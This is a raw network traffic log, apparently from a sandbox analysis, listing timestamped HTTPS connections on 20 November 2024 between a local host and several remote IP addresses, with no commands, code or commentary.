                                                                                                                                                                                            Nov 20, 2024 21:04:51.415293932 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.415335894 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.415365934 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.459768057 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.459820032 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.459886074 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.459892988 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.459971905 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500267029 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500395060 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500402927 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500446081 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500457048 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500504017 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500907898 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.500920057 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:54.455689907 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:54.455761909 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:54.455827951 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:54.856658936 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:54.856698990 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:55.967639923 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:55.967722893 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:55.967808008 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:55.992737055 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:55.992763042 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:57.726162910 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:57.726259947 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:57.728359938 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:57.728387117 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:57.728717089 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:57.738359928 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:57.783338070 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.201325893 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.201378107 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.201437950 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.201462984 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.201483011 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.201499939 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.201528072 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.263866901 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:58.263906956 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.264005899 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:58.264586926 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:58.264605045 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.392136097 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.392188072 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.392226934 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.392247915 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.392262936 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.392335892 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.443366051 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.443413973 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.443607092 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.443607092 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.443617105 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.444158077 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.568443060 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.568492889 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.568522930 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.568541050 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.568559885 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.568584919 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.608388901 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.608438969 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.608481884 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.608491898 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.608524084 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.608541965 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.629548073 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.629611969 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.629616976 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.629642010 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.629671097 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.629682064 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.651577950 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.750210047 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.750260115 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.750313997 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.750324965 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.750360966 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.750381947 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.769253969 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.769301891 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.769335032 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.769341946 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.769392014 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.784642935 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.784689903 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.784723043 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.784730911 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.784759998 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.784780025 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.802391052 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.802433968 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.802463055 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.802469015 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.802505016 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.802524090 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.820009947 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.820059061 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.820085049 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.820091963 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.820128918 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.820152044 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.936425924 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.936474085 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.936511040 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.936527967 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.936558962 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.936577082 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.951389074 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.951443911 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.951464891 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.951487064 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.951527119 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.951549053 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957154989 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957231998 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957238913 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957285881 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957319021 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957369089 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957745075 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957761049 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957775116 CET49796443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:58.957793951 CET4434979613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.009495974 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.009527922 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.009598970 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.010508060 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.010529041 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.010593891 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.010821104 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.010838985 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.011656046 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.011704922 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.011763096 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.011903048 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.011915922 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013295889 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013370037 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013442039 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013814926 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013825893 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013875961 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013962030 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.013973951 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.014051914 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.014059067 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.014157057 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:59.014192104 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.923795938 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.923942089 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:59.925736904 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:59.925749063 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.926001072 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:59.934757948 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:59.979341030 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.594141006 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.594203949 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.594247103 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.594270945 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:05:00.594286919 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.594301939 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:05:00.594335079 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:05:00.631656885 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.631724119 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.631789923 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:05:00.631808043 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.631908894 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.631958008 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:05:00.632263899 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:05:00.632282972 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.632294893 CET49805443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:05:00.632301092 CET44349805172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.793334961 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.796938896 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.797877073 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.814821005 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.814856052 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.815536022 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.815541029 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.815794945 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.815866947 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.816164970 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.816179991 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.816370964 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.816400051 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.816730976 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.816742897 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.822669983 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.823050976 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.823142052 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.823483944 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.823499918 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.930573940 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.931384087 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.931423903 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:00.931804895 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:00.931812048 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.238668919 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.238753080 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.238873959 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.243592024 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.243665934 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.243753910 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.245764017 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.245799065 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.245870113 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.245892048 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.245925903 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.273669004 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.273710012 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.273802996 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.273833990 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.274384022 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.277673960 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.301450968 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.301479101 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.301491022 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.301498890 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.304554939 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.304560900 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.306756973 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.306793928 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.306823015 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.306843996 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.307514906 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.307537079 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.307549000 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.307554960 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.314636946 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.314687014 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.315207958 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.315639019 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.315664053 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.319801092 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.319856882 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.319958925 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.320596933 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.320622921 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.322771072 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.322797060 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.322885990 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.323050976 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.323064089 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.323239088 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.323265076 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.323328018 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.323432922 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.323450089 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.375737906 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.375783920 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.375854015 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.375880957 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.375941992 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.381556988 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.381688118 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.381762028 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.384368896 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.384368896 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.384383917 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.384396076 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.411591053 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.411634922 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:01.411719084 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.413898945 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:01.413914919 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.064074039 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.064604044 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.064641953 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.065329075 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.065335989 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.190928936 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.191462040 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.191483021 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.191971064 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.191979885 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.193118095 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.193389893 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.193406105 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.193705082 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.193708897 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.212376118 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.212713957 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.212791920 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.213084936 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.213099003 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.220387936 CET4434982013.107.246.63192.168.2.4
